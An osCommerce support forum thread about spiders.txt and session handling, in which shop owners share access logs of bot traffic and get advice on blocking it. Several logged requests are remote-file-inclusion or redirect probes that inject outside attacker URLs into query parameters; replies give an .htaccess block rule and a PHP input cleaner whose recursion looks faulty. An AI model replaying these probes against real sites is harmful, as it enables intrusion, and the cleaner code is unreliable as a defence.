Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Updated spiders.txt Official Support Topic


stevel

Recommended Posts

Not really. I just figure it's a lot more data to read and loop through on every page access.

Thanks for the reply. I've also a question about bot names. The readme says: "For example, "ebot" matches Googlebot, "nbot" matches msnbot." Does it mean that these shortened names are now commonly understood by SEs upon spidering?

Link to comment
Share on other sites

No. The purpose of spiders.txt is for your osCommerce store to recognize when a spider is visiting so that it won't be assigned a session. There is no need nor attempt to identify which particular spider is visiting. For example, lots of spiders have the string "crawl" in their user agent (may show as Crawler, etc.) The string "crawl" matches all of them. Similarly, a number of spiders, including Googlebot, have the string "ebot", and non-spider visitors never (we hope) do. Therefore, any user agent string containing "ebot" as a substring is deemed a spider.

 

The search engines do not ever look at this file nor do they care. The only thing that matters is whether or not a spider is identified as a spider and a non-spider isn't incorrectly deemed a spider. The use of substrings is an attempt at optimizing the detection, that is all.

Link to comment
Share on other sites

  • 2 months later...

Hello,

 

I have some IP addresses range visiting just one page at a time at my site and adding random products to a cart for a while already. The last digits of the IP addresses differ every time.

82.99.30.48 - - [04/Nov/2007:13:54:56 -0700] "GET /index.php?cName=accessories&osCsid=0e9cbf6e9135aebf9cefa420dfc61d1a HTTP/1.0" 200 39690 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

82.99.30.73 - - [04/Nov/2007:14:03:28 -0700] "GET /featured_products.php?osCsid=0e9cbf6e9135aebf9cefa420dfc61d1a HTTP/1.0" 200 46332 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

82.99.30.49 - - [04/Nov/2007:14:21:26 -0700] "GET /product_reviews.php?pName=adapt&products_id=317&language=en&osCsid=4bdff8b680aa49b36c5b88b40e7b1e2d HTTP/1.0" 200 36282 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

82.99.30.22 - - [04/Nov/2007:14:29:51 -0700] "GET /my_points_help.php?language=de HTTP/1.0" 200 45147 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

82.99.30.68 - - [04/Nov/2007:14:38:44 -0700] "GET /gv_faq.php?language=de HTTP/1.0" 200 34604 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

82.99.30.11 - - [04/Nov/2007:15:06:48 -0700] "GET /product_info.php?pName=adapt&osCsid=2fb4d1873b22d2bfd890af3d35bf0b54 HTTP/1.0" 200 42446 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

82.99.30.67 - - [04/Nov/2007:15:14:03 -0700] "GET /product_info.php?language=de&pName=control&cName=control&osCsid=2fb4d1873b22d2bfd890af3d35bf0b54 HTTP/1.0" 200 51933 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

82.99.30.4 - - [04/Nov/2007:16:01:19 -0700] "GET /index.php?sort=4a&page=1&cName=modules&osCsid=2fb4d1873b22d2bfd890af3d35bf0b54 HTTP/1.0" 200 42756 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

82.99.30.21 - - [04/Nov/2007:16:32:21 -0700] "GET /product_info.php?pName=kit-20&cName=kits&osCsid=ba8f7b14c77e6d9df1c521d15400e98b HTTP/1.0" 200 45094 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

 

etc...

What can I do with it?

 

Thanks.

Link to comment
Share on other sites

  • 1 month later...

I'm having same problem with wide range. I have almost 40 - 50 different visitors with strange IP address. I replaced my old spider.txt file with new one and this start to happen after that. take a look at this.

need help

 

00:08:30 0 Guest 99.228.214.14 03:02:48 03:02:48 /

00:08:29 0 Guest 24.71.223.148 03:02:49 03:02:49 /shopping_cart.php

00:08:21 0 Guest 24.71.223.148 03:02:57 03:02:57 /satellite-accessories-c-51.html

00:07:58 0 Guest 24.71.223.148 03:03:20 03:03:20 /satellite-accessories-satellite-finders-c-51_56.html

00:07:42 0 Guest 24.71.223.148 03:03:36 03:03:36 /font-color0000ffabout-c-59.html

00:07:30 0 Guest 99.228.214.14 03:03:48 03:03:48 /captiveworks-receivers-c-41.html

00:18:09 0 Guest 71.245.29.105 02:53:09 02:56:40 /satellite-accessories-satellite-motors-c-51_57.html

00:02:43 0 Guest 24.71.223.148 03:08:35 03:08:35 /shopping_cart.php

00:02:42 0 Guest 38.113.177.227 03:08:36 03:08:36 /other-electronics-electronics-c-38_37.html

00:00:08 0 Guest 76.64.204.111 03:11:10 03:11:10 /

00:00:38 0 Guest 216.197.133.146 03:10:40 03:10:40 /

00:11:05 0 Guest 142.177.229.37 03:00:13 03:00:13 /

00:10:49 0 Guest 24.71.223.148 03:00:29 03:00:29 /satellite-dishes-c-52.html

00:10:10 0 Guest 24.71.223.148 03:01:08 03:01:08 /captiveworks-receivers-c-41.html

00:09:54 0 Guest 24.71.223.148 03:01:24 03:01:24 /shopping_cart.php?sort=2a

00:09:34 0 Guest 24.71.223.148 03:01:44 03:01:44 /shopping_cart.php

00:09:26 0 Guest 24.71.223.148 03:01:52 03:01:52 /captiveworks-receivers-c-41.html

00:07:00 0 Guest 24.71.223.148 03:04:18 03:04:18 /create_account.php

00:02:01 0 Guest 24.71.223.148 03:09:17 03:09:17 /shopping_cart.php?sort=2a

00:02:17 0 Guest 24.71.223.148 03:09:01 03:09:01 /satellite-dishes-c-52.html

00:05:30 0 Guest 99.228.214.14 03:05:48 03:05:48 /captiveworks-receivers-c-41.html

00:09:06 0 Guest 24.71.223.148 03:02:12 03:02:12 /index.php

00:05:43 0 Guest 67.158.176.139 03:05:35 03:05:35 /

00:55:07 0 Guest 66.249.67.131 02:16:11 02:58:48 /advanced_search_result.php?keywords=digital+cameras&osCsid=7a3e

00:03:00 0 Guest 24.71.223.148 03:08:18 03:08:18 /index.php

00:03:25 0 Guest 24.71.223.148 03:07:53 03:07:53 /create_account.php

00:08:34 0 Guest 65.92.100.150 03:02:44 03:02:44 /

00:03:21 0 Guest 24.71.223.148 03:07:57 03:07:57 /create_account_success.php

00:08:51 0 Guest 24.71.223.148 03:02:27 03:02:27 /products_new.php

00:09:15 0 Guest 24.71.223.148 03:02:03 03:02:03 /shopping_cart.php?sort=2a

00:06:41 0 Guest 99.228.214.14 03:04:37 03:04:37 /captiveworks-receivers-c-41.html

00:14:13 0 Guest 142.177.229.37 02:57:05 02:57:05 /pansat-receivers-c-49.html

00:13:58 0 Guest 142.177.229.37 02:57:20 02:58:45 /advanced_search_result.php?keywords=digital+cameras&osCsid=7a3e

00:04:47 0 Guest 99.228.214.14 03:06:31 03:06:31 /captain-receivers-c-43.html

00:01:39 0 Guest 24.71.223.148 03:09:39 03:09:39 /login.php

00:01:54 0 Guest 38.113.177.227 03:09:24 03:09:24 /captiveworks-cw800s-receiver-p-174.html

00:16:06 0 Guest 142.177.229.37 02:55:12 03:00:07 /index.php?currency=USD&osCsid=8e5b46b96e49fd026113e76b774d8e0f

00:12:15 0 Guest 24.71.223.148 02:59:03 02:59:03 /

00:11:53 0 Guest 65.92.100.150 02:59:25 02:59:25 /

00:11:24 0 Guest 142.177.229.37 02:59:54 02:59:54 /other-electronics-cameras-c-38_28.html

00:11:15 0 Guest 142.177.229.37 03:00:03 03:00:03 /pansat-receivers-c-49.html

00:04:13 0 Guest 24.71.223.148 03:07:05 03:07:05 /create_account.php

00:02:09 0 Guest 38.113.177.227 03:09:09 03:09:09 /

00:10:23 0 Guest 24.71.223.148 03:00:55 03:00:55 /shopping_cart.php?sort=2a

Currently there are 44 customers online

 

 

 

please help. this is happening since last 72 hours. everytime I check my who's online I see this with different numbers.

Link to comment
Share on other sites

  • 2 weeks later...

Hi there I've just added the update spiders-large.txt and changed the file as stated to spiders.txt I'm still getting the bots below as you will see from the image any advice ? I'm new to all this so if you are able to explain it to me that would be great.

bots.jpg

 

Thank You

Regards

Ian :thumbsup:

Link to comment
Share on other sites

Looks as if my subscription to this topic expired again - sigh...

 

Ian,

 

The purpose of spiders.txt is NOT to prevent bots from spidering your site. Rather, it is to ensure that said bots don't get sessions so that they don't include session IDs in the links they index and that they stay out of functions that require a session (such as Add to Cart).

 

Irina,

 

The entries you show are (or are pretending to) come from a user browser. I agree that it looks suspicious, but there's nothing that spiders.txt can do for you since the user agent string is that of a normal browser. What you can do is add a DenyFrom entry to your .htaccess file to block accesses from this IP range (82.99.30)

 

irfan (beaman),

 

We would need to see the access log entries. A "Who's online" report is not sufficient. I'll comment that many of these look like normal users (cable modem customer, etc.)

Link to comment
Share on other sites

  • 3 weeks later...

Doesn't seem to be a regular spider. Could be someone writing code based on Amazon Web Services. I will check my logs to see if I have hits from this, but a check of yesterday's log doesn't show anything.

 

What are you seeing - spider-like activity over many links? Please provide some sample lines from the web access log.

Link to comment
Share on other sites

I am about to block the IP address, but I really dont want too.

 

 

Not sure how to provide the web access log, but here is a sample of what I think you want:

 

/-p-100.html?language=es

Http Code: 200 Date: Jan 08 12:39:59 Http Version: HTTP/1.0 Size in Bytes: 15209

Referer: http://www.ganodermacoffee.com/product_inf...products_id=100

Agent: Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com) [email:[email protected]]

 

 

/-p-99.html?language=es

Http Code: 200 Date: Jan 08 12:40:12 Http Version: HTTP/1.0 Size in Bytes: 15201

Referer: http://www.ganodermacoffee.com/-p-99.html

Agent: Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com) [email:[email protected]]

 

 

/-p-99.html?language=en

Http Code: 200 Date: Jan 08 12:40:22 Http Version: HTTP/1.0 Size in Bytes: 15790

Referer: http://www.ganodermacoffee.com/-p-99.html

Agent: Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com) [email:[email protected]]

 

 

 

/-pr-99.html

Http Code: 200 Date: Jan 08 12:40:33 Http Version: HTTP/1.0 Size in Bytes: 13829

Referer: http://www.ganodermacoffee.com/-p-99.html

Agent: Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com) [email:[email protected]]

 

 

 

/-p-102.html?language=es

Http Code: 200 Date: Jan 08 12:40:47 Http Version: HTTP/1.0 Size in Bytes: 15215

Referer: http://www.ganodermacoffee.com/product_inf...products_id=102

Agent: Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com) [email:[email protected]]

 

 

 

/-p-102.html?language=en

Http Code: 200 Date: Jan 08 12:41:05 Http Version: HTTP/1.0 Size in Bytes: 15843

Referer: http://www.ganodermacoffee.com/product_inf...products_id=102

Agent: Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com) [email:[email protected]]

 

 

 

-----------------------

 

01:39:40 Guest ec2-72-44-49-100.z-1.compute-1.amazonaws.com 11:10:13 12:49:53 Gano Coffee Club (Product) Yes Yes

Name: Guest

 

ID: 0

 

IP Address: 72.44.49.100

 

User Agent: Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com) [email:[email protected]]

 

osCsid: 49a31cd29bce4cd3e1e32bc4ff5462e6

 

------------------

 

It seems to just keep cycling through the products and adding 1 to the cart and now it has started to add a second item to the cart for each product.

 

 

 

Referer?: http://www.ganodermacoffee.com/

Link to comment
Share on other sites

Ah. This should be blocked by "heritrix" in spiders.txt. Perhaps your store is not configured to use it?

 

I would feel better if I saw entries from an actual access log.

Edited by stevel
Link to comment
Share on other sites

  • 2 weeks later...

I noticed some suspicious activities going on on my web site. It either a spider or a continuous script running. It visits my web site throughout the day, makes one click at a time, and always uses a different IP. It's hard to block it because IP changes all the time. Here is what I have in my access_log:

 

67.68.206.67 - - [30/Jan/2008:05:33:36 -0700] "GET /product_info.php?pName=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 72027 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

67.68.206.67 - - [30/Jan/2008:05:34:07 -0700] "GET /index.php?sort=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 48317 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

70.53.156.125 - - [30/Jan/2008:05:41:44 -0700] "GET /product_info.php?pName=http://laudanskisucksss.chat.ru/placeholder/image? HTTP/1.1" 200 72141 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

70.53.156.125 - - [30/Jan/2008:05:41:52 -0700] "GET /product_info.php?pName=http://laudanskisucksss.chat.ru/placeholder/image? HTTP/1.1" 200 72170 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

70.53.156.125 - - [30/Jan/2008:05:42:34 -0700] "GET /index.php?sort=http://laudanskisucksss.chat.ru/placeholder/image? HTTP/1.1" 200 48422 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

70.53.156.125 - - [30/Jan/2008:05:42:34 -0700] "GET /index.php?sort=http://laudanskisucksss.chat.ru/placeholder/image? HTTP/1.1" 200 48471 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

124.104.84.192 - - [30/Jan/2008:05:43:32 -0700] "GET /product_info.php?language=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 200 67772 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"

124.104.84.192 - - [30/Jan/2008:05:43:45 -0700] "GET /product_info.php?pName=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 200 66375 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"

64.231.108.203 - - [30/Jan/2008:05:51:28 -0700] "GET /product_info.php?pName=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 71998 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

64.231.108.203 - - [30/Jan/2008:05:51:30 -0700] "GET /product_info.php?pName=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 72027 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

64.231.108.203 - - [30/Jan/2008:05:51:30 -0700] "GET /product_info.php?pName=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 71998 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

64.231.108.203 - - [30/Jan/2008:05:51:32 -0700] "GET /product_info.php?pName=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 12945 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

64.231.108.203 - - [30/Jan/2008:05:52:13 -0700] "GET /index.php?sort=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 48219 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

64.231.108.203 - - [30/Jan/2008:05:52:13 -0700] "GET /index.php?sort=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 48256 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

64.231.108.203 - - [30/Jan/2008:05:52:15 -0700] "GET /index.php?sort=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 48399 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

64.231.108.203 - - [30/Jan/2008:05:52:21 -0700] "GET /index.php?sort=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 12945 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

69.159.62.217 - - [30/Jan/2008:06:20:32 -0700] "GET /index.php?sort=http://cherrygirl.h18.ru/images/cs.txt? HTTP/1.1" 200 48296 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; pt-BR; rv:1.7.7) Gecko/20050414 Firefox/2.0.5"

124.104.84.192 - - [30/Jan/2008:06:37:02 -0700] "GET /product_info.php?language=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 200 67776 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"

124.104.84.192 - - [30/Jan/2008:06:37:17 -0700] "GET /product_info.php?pName=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 200 66337 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"

67.68.206.67 - - [30/Jan/2008:07:15:23 -0700] "GET /product_info.php?pName=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 72027 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

 

and so on...

 

Can anybody please explain what's going on and if there is something I can do about it? Any help will be appreciated. Thanks.

Edited by Irin
Link to comment
Share on other sites

It's looking to see if it can use your site for redirecting URLs in spam emails.

 

If you are not using the "Visit this product's web site" feature, you can do this. Add this code to your .htaccess file:

 

RewriteEngine On

RewriteCond %{QUERY_STRING} :/ [NC]
RewriteRule ^ - [F]

 

If you already have the RewriteEngine line in there, you don't repeat it.

 

This will cause all attempts to access your site with a URL in the parameters to fail.

Link to comment
Share on other sites

It's looking to see if it can use your site for redirecting URLs in spam emails.

 

If you are not using the "Visit this product's web site" feature, you can do this. Add this code to your .htaccess file:

 

RewriteEngine On

RewriteCond %{QUERY_STRING} :/ [NC]
RewriteRule ^ - [F]

 

If you already have the RewriteEngine line in there, you don't repeat it.

 

This will cause all attempts to access your site with a URL in the parameters to fail.

Hi Stevel,

 

Is this the feature on product_info.php "For more information, please visit this products webpage."? If yes, I do use it. I added your code to my .htaccess file. Do you think it'll prevent the script from running?

 

Thanks for your help.

Link to comment
Share on other sites

Hi Stevel,

 

Is this the feature on product_info.php "For more information, please visit this products webpage."? If yes, I do use it. I added your code to my .htaccess file. Do you think it'll prevent the script from running?

 

Thanks for your help.

 

Yes, that's the feature. You'll probably find that those links stop working. It can be worked around by changing the URL used so that it does not include the "http://" part.

Link to comment
Share on other sites

Yes, that's the feature. You'll probably find that those links stop working. It can be worked around by changing the URL used so that it does not include the "http://" part.

Stevel,

 

Thanks a lot for your help. Since I added your code to my .htaccess file, I don't see any more strange URLs accessing my web site. It stopped all the attempts of using my web site for suspicious purposes. The redirect feature also seems to be working fine, the URL used to redirect to the web page is http://myshop.com/redirect.php?action=url&...cts%2Fpage.html. Thanks to you I got this problem sorted.

 

Thanks again.

Link to comment
Share on other sites

You're welcome. You should see "403" (Forbidden) errors show up in the log, but you'll see a lot fewer of those over time. You can rest assured that this closes off one possible way for spammers to abuse your site.

Link to comment
Share on other sites

You're welcome. You should see "403" (Forbidden) errors show up in the log, but you'll see a lot fewer of those over time. You can rest assured that this closes off one possible way for spammers to abuse your site.

Yep, I can see some "403" errors in my log but they are all for these strange URLs.

 

70.51.76.179 - - [30/Jan/2008:12:42:17 -0700] "GET /index.php?sort=http://ninaru.hut2.ru/images/cs.txt? HTTP/1.1" 403 307 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"

76.67.138.251 - - [30/Jan/2008:12:37:56 -0700] "GET /index.php?sort=http://0xg3458.hub.io/pb.php? HTTP/1.1" 403 307 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"

76.67.138.251 - - [30/Jan/2008:12:37:05 -0700] "GET /product_info.php?pName=http://0xg3458.hub.io/pb.php? HTTP/1.1" 403 314 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"

64.229.149.191 - - [30/Jan/2008:12:33:45 -0700] "GET /index.php?sort=http://migirlinme.krovatka.su/index? HTTP/1.1" 403 307 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

 

There are some other URLs are showing up in my log file, may be you know what are those:

 

196.217.86.107 - - [30/Jan/2008:12:53:45 -0700] "GET /osCommerce/images/prod.jpg HTTP/1.1" 301 366 "http://all-patch.org/vb/showthread.php?p=764145#post764145" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iOpus-I-M; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; MEGAUPLOAD 2.0)"

212.76.72.252 - - [30/Jan/2008:12:54:23 -0700] "GET /osCommerce/images/prod.jpg HTTP/1.1" 301 366 "http://www.bramjnet.com/vb3/showthread.php?t=99710" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SIMBAR={7B7C664E-CCE9-11DC-A053-000FB0E14566}; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 2.0.50727)"

212.76.72.252 - - [30/Jan/2008:12:54:24 -0700] "GET /images/prod.jpg HTTP/1.1" 200 9061 "http://www.bramjnet.com/vb3/showthread.php?t=99710" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SIMBAR={7B7C664E-CCE9-11DC-A053-000FB0E14566}; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 2.0.50727)"

 

Again, thanks for your help.

Edited by Irin
Link to comment
Share on other sites

RewriteEngine On

 

RewriteCond %{QUERY_STRING} :/ [NC]

RewriteRule ^ - [F]

 

 

If you already have the RewriteEngine line in there, you don't repeat it.

 

This will cause all attempts to access your site with a URL in the parameters to fail.

 

Using .htaccess really (imo) ought to be a last dirty resort in these cases. After all, we are talking about simply sanitising the $_GET variable. (maybe you $_REQUEST = $_GET + $_POST (after sanitising ofc) like me .. who needs $_COOKIE fer gods sake)

 

$_GET is often multidimensional so why not use a recursive cleaner, something like ..

 

$_GET = clean_get__recursive($_GET);

function clean_get__recursive($get_var)
{
 $get_var = preg_replace("/[^a-zA-Z0-9 _.-]/i", "", $get_var);

// Add the preg_replace to every element.
return array_map('clean_get__recursive', $get_var);
}

 

The preg_replace may be too heavy for some but the concept is sound.

Edited by Babygurgles
Link to comment
Share on other sites

Robert, that's an interesting idea but it doesn't signal to the spammers that they should go away. There's no legitimate purpose to having :/ in a $_GET parameter so the .htaccess takes care of it simply.

Link to comment
Share on other sites

Robert, that's an interesting idea but it doesn't signal to the spammers that they should go away. There's no legitimate purpose to having :/ in a $_GET parameter so the .htaccess takes care of it simply.

 

 

Perhaps a nice little error page saying #!@#! off! :D

 

Anyway .. I'm leading this thread off topic .. back to spiders.txt I think.

Edited by Babygurgles
Link to comment
Share on other sites

GAH! Livebot BEGONE!

 

I'm having hassles with livebot (livebot-65-55-165-14.search.live.com and others) impersonating real customers by using this useragent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322). This bot annoys me because it creates sessions (thereby putting osc session IDs in its index), adds things to the cart (making me excited that someone's about to buy something, then disappointing me when I realise what's going on) and doesn't play nice with spiders.txt.

 

Any idea how I can prevent this bot from creating sessions?

 

Cheers,

Max

Link to comment
Share on other sites

GAH! Livebot BEGONE!

 

I'm having hassles with livebot (livebot-65-55-165-14.search.live.com and others) impersonating real customers by using this useragent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322). This bot annoys me because it creates sessions (thereby putting osc session IDs in its index), adds things to the cart (making me excited that someone's about to buy something, then disappointing me when I realise what's going on) and doesn't play nice with spiders.txt.

 

Any idea how I can prevent this bot from creating sessions?

 

Cheers,

Max

 

If it uses the same IP every time just ban the IP from your site. I belive there is a add on for it or you can use .htaccess. http://tools.dynamicdrive.com/userban/ IP bans are not a 100% remedy and can easly ban a potential customer if not carefull.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Unfortunately, your content contains terms that we do not allow. Please edit your content to remove the highlighted words below.
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...